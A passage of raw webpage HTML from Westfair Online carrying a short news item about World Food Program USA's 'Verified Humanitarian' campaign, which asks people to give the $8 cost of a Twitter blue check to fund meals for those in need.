	<li id="menu-item-87445" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-87445"><a href="https://westfaironline.com/category/economic-development/">Economic Development</a></li>
	<li id="menu-item-142376" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-142376"><a href="https://westfaironline.com/category/hudson-valley/">Hudson Valley</a></li>
	<li id="menu-item-87449" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-87449"><a href="https://westfaironline.com/category/courts/">Courts</a></li>
	<li id="menu-item-87447" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-87447"><a href="https://westfaironline.com/category/banking-finance/">Banking &amp; Finance</a></li>
	<li id="menu-item-87448" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-87448"><a href="https://westfaironline.com/category/construction/">Construction</a></li>
	<li id="menu-item-87451" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-87451"><a href="https://westfaironline.com/category/economy/">Economy</a></li>
	<li id="menu-item-87452" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-87452"><a href="https://westfaironline.com/category/education/">Education</a></li>
	<li id="menu-item-87456" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-87456"><a href="https://westfaironline.com/category/health-care/">Health Care</a></li>
	<li id="menu-item-87454" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-87454"><a href="https://westfaironline.com/category/food-beverage/">Food &amp; Beverage</a></li>
	<li id="menu-item-87455" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-87455"><a href="https://westfaironline.com/category/government/">Government</a></li>
	<li id="menu-item-87459" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-87459"><a href="https://westfaironline.com/category/mergers-a-acquisitions/">Mergers &amp; Acquisitions</a></li>
	<li id="menu-item-87461" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-87461"><a href="https://westfaironline.com/category/nonprofits/">Nonprofits</a></li>
	<li id="menu-item-87463" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-87463"><a href="https://westfaironline.com/category/retail/">Retail</a></li>
	<li id="menu-item-87464" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-87464"><a href="https://westfaironline.com/category/small-business/">Small Business</a></li>
	<li id="menu-item-87465" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-87465"><a href="https://westfaironline.com/category/technology/">Technology</a></li>
</ul>
</li>
<li id="menu-item-152200" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-152200"><a href="#">FEATURES<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-152206" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-152206"><a href="https://westfaironline.com/category/exclusives/">Exclusives</a></li>
	<li id="menu-item-152202" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-152202"><a href="https://westfaironline.com/category/food-restaurants/">Food &amp; Restaurants</a></li>
	<li id="menu-item-152201" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-152201"><a href="https://westfaironline.com/category/travel/">Travel</a></li>
	<li id="menu-item-152203" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-152203"><a href="https://westfaironline.com/category/health-fitness/">Health &amp; Fitness</a></li>
	<li id="menu-item-152204" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-152204"><a href="https://westfaironline.com/category/home-design/">Home &amp; Design</a></li>
	<li id="menu-item-152483" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-152483"><a href="https://westfaironline.com/category/premium-content/newsmakers/">Good Things Happening</a></li>
</ul>
</li>
<li id="menu-item-87481" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-87481"><a href="https://westfaironline.com/news-videos-2/">VIDEOS</a></li>
<li id="menu-item-144497" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-144497"><a href="#">EVENTS<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-149588" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-149588"><a href="https://westfaironline.com/csuite2022/">2022 C-Suite Awards</a></li>
	<li id="menu-item-152112" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-152112"><a href="https://westfaironline.com/2022millennialgenz/">2022 Millennial + GenZ Awards</a></li>
	<li id="menu-item-146500" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-146500"><a href="#">Past Events<i class="td-icon-menu-right td-element-after"></i></a>
	<ul class="sub-menu">
		<li id="menu-item-148993" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-148993"><a href="https://westfaironline.com/dod2022/">2022 Doctors of Distinction</a></li>
		<li id="menu-item-143163" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-143163"><a href="https://westfaironline.com/40under40-2022/">2022 FORTY UNDER 40</a></li>
		<li id="menu-item-146720" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-146720"><a href="https://westfaironline.com/futureofrealestate/">2022 THE FUTURE OF REAL ESTATE</a></li>
		<li id="menu-item-139337" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-139337"><a href="https://westfaironline.com/2021millennialgenz/">2021 Milli + GenZ Awards</a></li>
		<li id="menu-item-134116" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-134116"><a href="https://westfaironline.com/dod2021/">2021 DOCTORS OF DISTINCTION</a></li>
		<li id="menu-item-133520" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-133520"><a href="https://westfaironline.com/csuite2021/">2021 C-SUITE</a></li>
		<li id="menu-item-135904" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-135904"><a href="https://westfaironline.com/top_wealth2021/">2021 TOP WEALTH ADVISORS Virtual Event</a></li>
		<li id="menu-item-121894" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-121894"><a href="https://westfaironline.com/40under40/">2021 FORTY UNDER 40 VIRTUAL EVENT</a></li>
	</ul>
</li>
	<li id="menu-item-146502" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-146502"><a href="https://westfaironline.com/business-events/">Events Calendar</a></li>
</ul>
</li>
<li id="menu-item-116919" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-116919"><a href="https://westfaironline.com/members/">MEMBERS</a></li>
<li id="menu-item-152828" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-152828"><a href="https://westfaironline.com/become-a-member/">SUBSCRIBE</a></li>
</ul></div>        </div>
    </div>

    <!-- register/login section -->
    </div>    <div class="td-search-background"></div>
<div class="td-search-wrap-mob">
	<div class="td-drop-down-search">
		<form method="get" class="td-search-form" action="https://westfaironline.com/">
			<!-- close button -->
			<div class="td-search-close">
				<a href="#"><i class="td-icon-close-mobile"></i></a>
			</div>
			<div role="search" class="td-search-input">
				<span>Search</span>
				<input id="td-header-search-mob" type="text" value="" name="s" autocomplete="off" />
			</div>
		</form>
		<div id="td-aj-search-mob"></div>
	</div>
</div>

    <div id="td-outer-wrap">
    
        <div class="td-outer-container">
        
            <!--
Header style 1
-->

<div class="td-header-container td-header-wrap td-header-style-1">
    <div class="td-header-row td-header-top-menu">
        
    <div class="td-top-bar-container top-bar-style-1">
        <div class="td-header-sp-top-menu">

            <div class="td_data_time">
            <div style="visibility:hidden;">

                Wednesday, November 16, 2022
            </div>
        </div>
    <div class="menu-top-container"><ul id="menu-secondary-menu" class="top-header-menu"><li id="menu-item-87783" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first td-menu-item td-normal-menu menu-item-87783"><a href="https://westfaironline.com/advertise/">Advertise</a></li>
<li id="menu-item-87784" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-87784"><a href="https://westfaironline.com/contact/">Contact</a></li>
<li id="menu-item-153130" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-153130"><a href="https://my.westfaironline.com">SIGN IN</a></li>
</ul></div></div>            <div class="td-header-sp-top-widget">
        
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.facebook.com/WestfairOnline" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.instagram.com/westfaironline/" title="Instagram">
                <i class="td-icon-font td-icon-instagram"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.linkedin.com/company/westfair-business-publications" title="Linkedin">
                <i class="td-icon-font td-icon-linkedin"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://twitter.com/westfaironline" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.youtube.com/user/thewagmag" title="Youtube">
                <i class="td-icon-font td-icon-youtube"></i>
            </a>
        </span>    </div>
        </div>

<!-- LOGIN MODAL -->

                <div  id="login-form" class="white-popup-block mfp-hide mfp-with-anim td-login-modal-wrap">
                    <div class="td-login-wrap">
                        <a href="#" aria-label="Back" class="td-back-button"><i class="td-icon-modal-back"></i></a>
                        <div id="td-login-div" class="td-login-form-div td-display-block">
                            <div class="td-login-panel-title">Sign in</div>
                            <div class="td-login-panel-descr">Welcome! Log into your account</div>
                            <div class="td_display_err"></div>
                            <form id="loginForm" action="#" method="post">
                                <div class="td-login-inputs"><input class="td-login-input" autocomplete="username" type="text" name="login_email" id="login_email" value="" required><label for="login_email">your username</label></div>
                                <div class="td-login-inputs"><input class="td-login-input" autocomplete="current-password" type="password" name="login_pass" id="login_pass" value="" required><label for="login_pass">your password</label></div>
                                <input type="button" name="login_button" id="login_button" class="wpb_button btn td-login-button" value="Login">
                                
                            </form>
                            
                            

                            <div class="td-login-info-text"><a href="#" id="forgot-pass-link">Forgot your password? Get help</a></div>
                            
                            
                        </div>

                        

                         <div id="td-forgot-pass-div" class="td-login-form-div td-display-none">
                            <div class="td-login-panel-title">Password recovery</div>
                            <div class="td-login-panel-descr">Recover your password</div>
                            <div class="td_display_err"></div>
                            <form id="forgotpassForm" action="#" method="post">
                                <div class="td-login-inputs"><input class="td-login-input" type="text" name="forgot_email" id="forgot_email" value="" required><label for="forgot_email">your email</label></div>
                                <input type="button" name="forgot_button" id="forgot_button" class="wpb_button btn td-login-button" value="Send My Password">
                            </form>
                            <div class="td-login-info-text">A password will be e-mailed to you.</div>
                        </div>
                    </div>
                </div>
                    </div>

    <div class="td-header-row td-header-header">
        <div class="td-header-sp-logo">
                        <a class="td-main-logo" href="https://westfaironline.com/">
                <img  alt="" title="Westfair" width="600" height="125" data-src="https://westfaironline.com/wp-content/uploads/2020/09/westfair.jpg" class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" /><noscript><img src="https://westfaironline.com/wp-content/uploads/2020/09/westfair.jpg" alt="" title="Westfair" width="600" height="125"/></noscript>
                <span class="td-visual-hidden">Westfair Communications</span>
            </a>
                </div>
        <div class="td-header-sp-rec">
            
<div class="td-header-ad-wrap  td-ad-m">
    <div class="td-a-rec td-a-rec-id-header  td-rec-hide-on-tp td-rec-hide-on-p tdi_1 td_block_template_1"><script async src="https://securepubads.g.doubleclick.net/tag/js/gpt.js"></script>
<script>
  window.googletag = window.googletag || {cmd: []};
  googletag.cmd.push(function() {
    googletag.defineSlot('/7467761/Combined_TopBar_728X90', [728, 90], 'div-gpt-ad-1637525357909-0').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
    googletag.enableServices();
  });
</script>
<!-- /7467761/Combined_TopBar_728X90 -->
<div id='div-gpt-ad-1637525357909-0' style='min-width: 728px; min-height: 90px;'>
  <script>
    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1637525357909-0'); });
  </script>
</div></div>

</div>        </div>
    </div>

    <div class="td-header-menu-wrap">
        <div class="td-header-row td-header-border td-header-main-menu">
            <div id="td-header-menu" role="navigation">
    <div id="td-top-mobile-toggle"><a href="#" aria-label="mobile-toggle"><i class="td-icon-font td-icon-mobile"></i></a></div>
    <div class="td-main-menu-logo td-logo-in-header">
        		<a class="td-mobile-logo td-sticky-mobile" href="https://westfaironline.com/">
			<img  alt="" title="Westfair" data-src="https://westfaironline.com/wp-content/uploads/2017/01/westfair-150x156.png" class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" /><noscript><img src="https://westfaironline.com/wp-content/uploads/2017/01/westfair-150x156.png" alt="" title="Westfair"/></noscript>
		</a>
				<a class="td-header-logo td-sticky-mobile" href="https://westfaironline.com/">
			<img  alt="" title="Westfair" data-src="https://westfaironline.com/wp-content/uploads/2020/09/westfair.jpg" class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" /><noscript><img src="https://westfaironline.com/wp-content/uploads/2020/09/westfair.jpg" alt="" title="Westfair"/></noscript>
		</a>
		    </div>
    <div class="menu-new-main-menu-container"><ul id="menu-new-main-menu-1" class="sf-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first td-menu-item td-normal-menu menu-item-87444"><a href="https://westfaironline.com/">HOME</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-87443"><a href="https://westfaironline.com/westchester-county-business-journal/">WESTCHESTER</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-87442"><a href="https://westfaironline.com/fairfield-news/">FAIRFIELD</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children td-menu-item td-normal-menu menu-item-137908"><a href="#">E-EDITIONS</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-137909"><a href="https://westfaironline.com/category/premium-content/digital-archives-fairfield/">Fairfield County</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-137910"><a href="https://westfaironline.com/category/premium-content/digital-archives-westchester/">Westchester County</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-125662"><a href="https://westfaironline.com/category/flipbooks/">Supplements</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children td-menu-item td-normal-menu menu-item-87370"><a href="https://westfaironline.com/industries/">INDUSTRIES</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-87462"><a href="https://westfaironline.com/category/real-estate/">Real Estate</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-87445"><a href="https://westfaironline.com/category/economic-development/">Economic Development</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-142376"><a href="https://westfaironline.com/category/hudson-valley/">Hudson Valley</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-87449"><a href="https://westfaironline.com/category/courts/">Courts</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-87447"><a href="https://westfaironline.com/category/banking-finance/">Banking &amp; Finance</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-87448"><a href="https://westfaironline.com/category/construction/">Construction</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-87451"><a href="https://westfaironline.com/category/economy/">Economy</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-87452"><a href="https://westfaironline.com/category/education/">Education</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-87456"><a href="https://westfaironline.com/category/health-care/">Health Care</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent td-menu-item td-normal-menu menu-item-87454"><a href="https://westfaironline.com/category/food-beverage/">Food &amp; Beverage</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-87455"><a href="https://westfaironline.com/category/government/">Government</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-87459"><a href="https://westfaironline.com/category/mergers-a-acquisitions/">Mergers &amp; Acquisitions</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-87461"><a href="https://westfaironline.com/category/nonprofits/">Nonprofits</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-87463"><a href="https://westfaironline.com/category/retail/">Retail</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-87464"><a href="https://westfaironline.com/category/small-business/">Small Business</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-87465"><a href="https://westfaironline.com/category/technology/">Technology</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children td-menu-item td-normal-menu menu-item-152200"><a href="#">FEATURES</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-152206"><a href="https://westfaironline.com/category/exclusives/">Exclusives</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-152202"><a href="https://westfaironline.com/category/food-restaurants/">Food &amp; Restaurants</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-152201"><a href="https://westfaironline.com/category/travel/">Travel</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-152203"><a href="https://westfaironline.com/category/health-fitness/">Health &amp; Fitness</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-152204"><a href="https://westfaironline.com/category/home-design/">Home &amp; Design</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-152483"><a href="https://westfaironline.com/category/premium-content/newsmakers/">Good Things Happening</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-87481"><a href="https://westfaironline.com/news-videos-2/">VIDEOS</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children td-menu-item td-normal-menu menu-item-144497"><a href="#">EVENTS</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-149588"><a href="https://westfaironline.com/csuite2022/">2022 C-Suite Awards</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-152112"><a href="https://westfaironline.com/2022millennialgenz/">2022 Millennial + GenZ Awards</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children td-menu-item td-normal-menu menu-item-146500"><a href="#">Past Events</a>
	<ul class="sub-menu">
		<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-148993"><a href="https://westfaironline.com/dod2022/">2022 Doctors of Distinction</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-143163"><a href="https://westfaironline.com/40under40-2022/">2022 FORTY UNDER 40</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-146720"><a href="https://westfaironline.com/futureofrealestate/">2022 THE FUTURE OF REAL ESTATE</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-139337"><a href="https://westfaironline.com/2021millennialgenz/">2021 Milli + GenZ Awards</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-134116"><a href="https://westfaironline.com/dod2021/">2021 DOCTORS OF DISTINCTION</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-133520"><a href="https://westfaironline.com/csuite2021/">2021 C-SUITE</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-135904"><a href="https://westfaironline.com/top_wealth2021/">2021 TOP WEALTH ADVISORS Virtual Event</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-121894"><a href="https://westfaironline.com/40under40/">2021 FORTY UNDER 40 VIRTUAL EVENT</a></li>
	</ul>
</li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-146502"><a href="https://westfaironline.com/business-events/">Events Calendar</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-116919"><a href="https://westfaironline.com/members/">MEMBERS</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-152828"><a href="https://westfaironline.com/become-a-member/">SUBSCRIBE</a></li>
</ul></div></div>

<div class="td-search-wrapper">
    <div id="td-top-search">
        <!-- Search -->
        <div class="header-search-wrap">
            <div class="dropdown header-search">
                <a id="td-header-search-button" href="#" role="button" aria-label="search icon" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
                <a id="td-header-search-button-mob" href="#" role="button" aria-label="search icon" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
            </div>
        </div>
    </div>
</div>

<div class="header-search-wrap">
	<div class="dropdown header-search">
		<div class="td-drop-down-search">
			<form method="get" class="td-search-form" action="https://westfaironline.com/">
				<div role="search" class="td-head-form-search-wrap">
					<input class="needsclick" id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Search" />
				</div>
			</form>
			<div id="td-aj-search"></div>
		</div>
	</div>
</div>        </div>
    </div>
</div><div class="td-container td-post-template-1">
    <div class="td-container-border">
        <div class="td-pb-row">
                                    <div class="td-pb-span8 td-main-content" role="main">
                            <div class="td-ss-main-content">
                                

    <article id="post-155786" class="post-155786 post type-post status-publish format-standard has-post-thumbnail hentry category-food-beverage tag-verified-humanitarian tag-world-food-program" itemscope itemtype="https://schema.org/Article">
        <div class="td-post-header td-pb-padding-side">
            <div class="entry-crumbs"><span><a title="" class="entry-crumb" href="https://westfaironline.com/">Home</a></span> <i class="td-icon-right td-bread-sep"></i> <span><a title="View all posts in Food &amp;amp; Beverage" class="entry-crumb" href="https://westfaironline.com/category/food-beverage/">Food &amp; Beverage</a></span> <i class="td-icon-right td-bread-sep td-bred-no-url-last"></i> <span class="td-bred-no-url-last">New &#8216;Verified Humanitarian&#8217; campaign offers alternative outlet for Twitter&#8217;s $8 blue check</span></div>
            <ul class="td-category"><li class="entry-category"><a  href="https://westfaironline.com/category/food-beverage/">Food &amp; Beverage</a></li></ul>
            <header>
                <h1 class="entry-title">New &#8216;Verified Humanitarian&#8217; campaign offers alternative outlet for Twitter&#8217;s $8 blue check</h1>

                

                <div class="meta-info">

                    <div class="td-post-author-name"><div class="td-author-by">By</div> <a href="https://westfaironline.com/author/philhall/">Phil Hall</a><div class="td-author-line"> - </div> </div>                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-11-16T05:01:10-05:00" >November 16, 2022</time></span>                                                                            </div>
            </header>


        </div>

        

        <div class="td-post-content td-pb-padding-side">
            <div class="td-featured-image-rec">

                        </div>


            <div class="addtoany_share_save_container addtoany_content addtoany_content_top"><div class="a2a_kit a2a_kit_size_24 addtoany_list" data-a2a-url="https://westfaironline.com/food-beverage/new-verified-humanitarian-campaign-offers-alternative-outlet-for-twitters-8-blue-check/" data-a2a-title="New ‘Verified Humanitarian’ campaign offers alternative outlet for Twitter’s $8 blue check"><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwestfaironline.com%2Ffood-beverage%2Fnew-verified-humanitarian-campaign-offers-alternative-outlet-for-twitters-8-blue-check%2F&amp;linkname=New%20%E2%80%98Verified%20Humanitarian%E2%80%99%20campaign%20offers%20alternative%20outlet%20for%20Twitter%E2%80%99s%20%248%20blue%20check" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fwestfaironline.com%2Ffood-beverage%2Fnew-verified-humanitarian-campaign-offers-alternative-outlet-for-twitters-8-blue-check%2F&amp;linkname=New%20%E2%80%98Verified%20Humanitarian%E2%80%99%20campaign%20offers%20alternative%20outlet%20for%20Twitter%E2%80%99s%20%248%20blue%20check" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwestfaironline.com%2Ffood-beverage%2Fnew-verified-humanitarian-campaign-offers-alternative-outlet-for-twitters-8-blue-check%2F&amp;linkname=New%20%E2%80%98Verified%20Humanitarian%E2%80%99%20campaign%20offers%20alternative%20outlet%20for%20Twitter%E2%80%99s%20%248%20blue%20check" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwestfaironline.com%2Ffood-beverage%2Fnew-verified-humanitarian-campaign-offers-alternative-outlet-for-twitters-8-blue-check%2F&amp;linkname=New%20%E2%80%98Verified%20Humanitarian%E2%80%99%20campaign%20offers%20alternative%20outlet%20for%20Twitter%E2%80%99s%20%248%20blue%20check" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><div class="pigeon-remove" data-pn="1" style="display:none;"><p>World Food Program USA has launched Verified Humanitarian, a social media campaign aimed at encouraging Americans to join the global movement to end hunger. </p>
<p><img decoding="async"   width="417" height="282" data-src="https://westfaironline.com/wp-content/uploads/2022/11/loaf-g04efa96c4_1920-scaled.jpg" class="wp-image-106985 alignleft lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="><noscript><img decoding="async" class="wp-image-106985 alignleft" src="https://westfaironline.com/wp-content/uploads/2022/11/loaf-g04efa96c4_1920-scaled.jpg" width="417" height="282"></noscript></p>
<p>At a time when social media denizens debate whether it&#8217;s worth spending $8 for a &#8220;verified checkmark&#8221; on Twitter, World Food Program USA invites people to spend $8 to become a “verified humanitarian,” with the $8 being spent for 16 life-saving meals to someone in need.</p>
<p>&#8220;Watching the news and following social media lately, I&#8217;m amazed at the energy and attention Americans are giving to the &#8216;pay for it&#8217; issue,&#8221; said Barron Segar, president and CEO at World Food Program USA. &#8220;There&#8217;s so much suffering and need in the world today – why spend $8 on a verified checkmark when you can spend $8 to feed someone in need? I urge Americans to spend their hard-earned dollars to make a difference in someone&#8217;s life.&#8221;</p>
<p>For more information on becoming a “verified humanitarian,” visit <a href="http://www.wfpusa.org/verifiedhumanitarian" rel="noopener" target="_blank">www.wfpusa.org/verifiedhumanitarian</a>.</p>
</div><div class="pigeon-context-promotion" style="display:none;"><p class="pigeon-cta">This page is available to subscribers. <a href="#" class="pigeon-open">Click here to sign in or get access</a>.</p></div><div class="td-a-rec td-a-rec-id-content_bottom  tdi_3 td_block_template_1"><script type="text/javascript">
var bannersnack_embed = {"hash":"bx907fsau","width":728,"height":90,"t":1488029628,"userId":27676241,"responsive":true,"type":"html5"};
</script>
<script type="text/javascript" src="westfaironline.com/wp-content/uploads/2019/09/MilliAwards_728x90_Nom.jpg"></script></div>        </div>


        <footer>
                        
            <div class="td-post-source-tags td-pb-padding-side">
                                            </div>

                        <div class="td-block-row td-post-next-prev"><div class="td-block-span6 td-post-prev-post"><div class="td-post-next-prev-content"><span>Previous article</span><a href="https://westfaironline.com/premium-content/honoring-tradition/">HONORING TRADITION</a></div></div><div class="td-next-prev-separator"></div></div>            <div class="author-box-wrap"><a href="https://westfaironline.com/author/philhall/" aria-label="author-photo"><img alt=''  data-srcset='https://secure.gravatar.com/avatar/b541ed961d7ccf2948c0c284120fa7b1?s=192&#038;d=mm&#038;r=g 2x'  height='96' width='96' decoding='async' data-src='https://secure.gravatar.com/avatar/b541ed961d7ccf2948c0c284120fa7b1?s=96&#038;d=mm&#038;r=g' class='avatar avatar-96 photo lazyload' src='data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==' /><noscript><img alt='' src='https://secure.gravatar.com/avatar/b541ed961d7ccf2948c0c284120fa7b1?s=96&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/b541ed961d7ccf2948c0c284120fa7b1?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' decoding='async'/></noscript></a><div class="desc"><div class="td-author-name vcard author"><span class="fn"><a href="https://westfaironline.com/author/philhall/">Phil Hall</a></span></div><div class="td-author-url"><a href="https://westfaironline.com/">https://westfaironline.com/</a></div><div class="td-author-description">Phil Hall's writing for Westfair Communications has earned multiple awards from the Connecticut Press Club and the Connecticut Society of Professional Journalists. He is a former United Nations-based reporter for Fairchild Broadcast News and the author of 11 books (including the upcoming "100 Years of Wall Street Crooks," published by Bicep Books). He is also the host of the SoundCloud podcast "The Online Movie Show," host of the WAPJ-FM talk show "Nutmeg Chatter" and a writer with credits in The New York Times, New York Daily News, Hartford Courant, Wired, The Hill's Congress Blog, Profit Confidential, The MReport and StockNews.com. Outside of journalism, he is also a horror movie actor - usually playing the 